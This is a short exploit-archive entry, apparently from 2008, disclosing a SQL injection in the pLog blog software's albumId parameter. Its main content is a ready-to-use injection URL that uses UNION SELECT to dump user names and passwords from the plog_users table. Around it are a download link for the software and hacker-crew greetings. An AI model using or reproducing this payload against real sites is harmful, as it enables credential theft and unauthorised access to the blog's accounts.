pLog (albumId) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : pLog (albumId) Remote SQL Injection Vulnerability
# Published : 2008-06-02
# Author : DreamTurk
# Previous Title : Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability
# Next Title : SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities

pLog (albumId) Remote Sql ?°nj.

DreamTurk / dream@dr3amturk.org

Down : http://sourceforge.net/project/showfiles.php?group_id=83964&package_id=86556

http://localhost/index.php?op=ViewAlbum&albumId=-1/**/union/**/select/**/0,1,user,password,4,5,6,7,8 from plog_users/*&blogId=1

4ever sqL L0v3r'Z Crew 2008 http://coderx.org

Greatz : Cr@zy_King & BLasTer & DarKxBoyZ & Rmx & TR_ip & str0ke

----------- 

# www.Syue.com [2008-06-02]